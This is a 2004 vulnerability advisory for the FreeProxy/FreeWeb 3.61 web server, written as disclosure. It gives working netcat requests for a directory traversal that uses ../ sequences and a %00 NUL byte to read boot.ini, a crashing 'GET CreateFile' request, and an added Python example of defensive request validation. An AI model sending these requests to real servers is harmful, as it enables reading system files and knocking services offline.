SP Research Labs Advisory x08
-----------------------------

FreeProxy/FreeWeb v3.61 Multiple Vulnerabilities
------------------------------------------------

Vendor Home Page: http://www.alphalink.com.au/~gregr/
Date Released - 1.8.2004
Downloads.com reported 105,607 downloads.

------------------------------------
Product Description from the vendor:

FreeProxy is professional Freeware which channels requests for internet pages via a single computer and enables many computers to share an internet connection. If you have dial-up internet access, you can use the Demand Dial or Auto-Dial feature to dial up the internet either when it detects you want to access the internet (demand) or maintain a strict schedule of connection times (auto). Works fast with Cable/Broadband.

--------------------
Directory Traversal:

A directory traversal vulnerability exists within the webserver part of this product, and not the proxy part of it. The request below walks out of the web root with "../" and appends a %00 (NUL) byte followed by ".html"; the server accepts the name on the strength of its ".html" suffix, while the file is opened with the name truncated at the NUL, so boot.ini is returned.

Example:
--------
C:\>nc 192.168.1.100 80
GET /../../../../../../../boot.ini%00.html HTTP/1.0

HTTP/1.0 200 OK
Server: FreeProxy/3.61
Date: Fri, 09 Jan 2004 05:09:15 GMT
Content-Type: application/octet-stream
Last-Modified: Tue, 04 Nov 2003 16:55:36 GMT
Content-Length: 194

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

------------------
Denial Of Service:

Making an HTTP request whose target is the name 'CreateFile' (instead of an absolute path) causes the entire application to crash.

Example:
--------
C:\>nc 192.168.1.100 80
GET CreateFile HTTP/1.0

**Application Crashes**

I get the following error message:

Unhandled exception in FreeProxy.exe: 0xC0000005: Access Violation.
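Both findings come down to the same missing step: the web server acts on the raw request target before validating it. The following added example (not code from the advisory or from the FreeProxy project) shows how a small static-file server should handle a request line so that the two requests above are refused before any file API is touched: the target is percent-decoded first, NUL and other control bytes are rejected, the path is normalised and checked to stay inside the document root, and the suffix allow-list is applied only to the decoded, normalised name. A request line whose target is not an absolute path (the 'GET CreateFile' case) is answered with 400 rather than handed to the filesystem layer; the advisory does not state why that request crashes FreeProxy, and the example makes no claim about the root cause. The document root, suffix list and function names are assumptions made for the example.

```python
"""Added example: request-target validation for a static-file web server.
Not part of the FreeProxy advisory or product; DOC_ROOT and the suffix
allow-list below are constructed values."""
import os
from urllib.parse import unquote_to_bytes

DOC_ROOT = "/var/www/htdocs"  # constructed document root for the example

ALLOWED_SUFFIXES = {".html", ".htm", ".txt", ".css", ".js", ".png", ".gif", ".jpg"}


def naive_is_allowed(request_target: str) -> bool:
    """The kind of check the advisory's request defeats: it inspects only
    the suffix of the still-encoded string, so '...boot.ini%00.html' ends in
    '.html' and is accepted, while a C-level open() later stops at the NUL
    byte and opens boot.ini instead."""
    return any(request_target.lower().endswith(s) for s in ALLOWED_SUFFIXES)


def parse_request_line(line: str):
    """Split 'METHOD target HTTP/x.y'. Returns None for anything that is not
    a well-formed request line with an absolute-path target, so a line such
    as 'GET CreateFile HTTP/1.0' never reaches the file-serving code."""
    parts = line.strip().split(" ")
    if len(parts) != 3:
        return None
    method, target, version = parts
    if not version.startswith("HTTP/1."):
        return None
    if not target.startswith("/"):
        return None
    return method, target, version


def resolve_target(request_target: str, doc_root: str = DOC_ROOT):
    """Map a request target to a filesystem path, or return None to refuse it.
    1. percent-decode to bytes BEFORE any check (so %00 and %2e%2e are seen);
    2. refuse NUL and other control bytes outright;
    3. normalise against the document root and require containment, which
       catches '../' sequences however many of them there are;
    4. apply the suffix allow-list to the decoded, normalised name."""
    raw = unquote_to_bytes(request_target.split("?", 1)[0])
    if any(b < 0x20 or b == 0x7F for b in raw):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    root = os.path.normpath(doc_root)
    candidate = os.path.normpath(os.path.join(root, text.lstrip("/")))
    # Containment: the normalised path must be the root or live beneath it.
    if os.path.commonpath([root, candidate]) != root:
        return None
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_SUFFIXES:
        return None
    return candidate


def classify_request(line: str, doc_root: str = DOC_ROOT):
    """Return (status_code, path): 400 for a malformed request line, 403 for
    a target that fails validation, 200 with the path to serve otherwise."""
    parsed = parse_request_line(line)
    if parsed is None:
        return 400, None
    _, target, _ = parsed
    path = resolve_target(target, doc_root)
    if path is None:
        return 403, None
    return 200, path


if __name__ == "__main__":
    # The two request lines from the advisory plus one legitimate request.
    for req in ("GET /../../../../../../../boot.ini%00.html HTTP/1.0",
                "GET CreateFile HTTP/1.0",
                "GET /index.html HTTP/1.0"):
        print(req, "->", classify_request(req))
```

The contrast worth noticing is that `naive_is_allowed` returns True for the advisory's traversal request because it only looks at the encoded suffix, whereas `resolve_target` refuses it on the NUL byte, and would refuse the same request without the %00 on the containment check. Normalisation here is purely lexical (`os.path.normpath`); a server whose document root may contain symlinks should additionally realpath-resolve the candidate and re-check containment.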
-----------------------
Tested on WindowsXP SP1

Original Advisory: http://www.security-protocols.com/modules.php?name=News&file=article&sid=1691&mode=&order=0&thold=0

Peace out,

------------------------------
badpack3t
www.security-protocols.com
------------------------------